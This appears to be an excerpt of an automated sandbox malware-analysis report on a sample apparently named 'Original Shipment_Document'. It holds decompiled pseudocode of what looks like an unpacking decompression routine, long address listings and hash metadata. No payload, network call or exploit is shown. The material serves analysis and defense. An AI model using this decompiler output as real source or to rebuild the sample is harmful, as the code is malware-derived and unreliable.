							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                0x00000000
                                                0x00406f4a
                                                0x00406f4a
                                                0x00406f4e
                                                0x00407005
                                                0x00407008
                                                0x00407014
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x004072e0
                                                0x004072e0
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072bb
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00000000
                                                0x0040746e
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x00000000
                                                0x004072dd
                                                0x00406f54
                                                0x00406f58
                                                0x00407499
                                                0x00407499
                                                0x0040749c
                                                0x004074a0
                                                0x004074a0
                                                0x00406f5e
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00407484
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x00000000
                                                0x00407495
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00406fac
                                                0x00406fac
                                                0x00406fac
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x00000000
                                                0x00406c8b
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x00000000
                                                0x00407267
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x00000000
                                                0x004073da
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00000000
                                                0x0040722f
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406A4F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
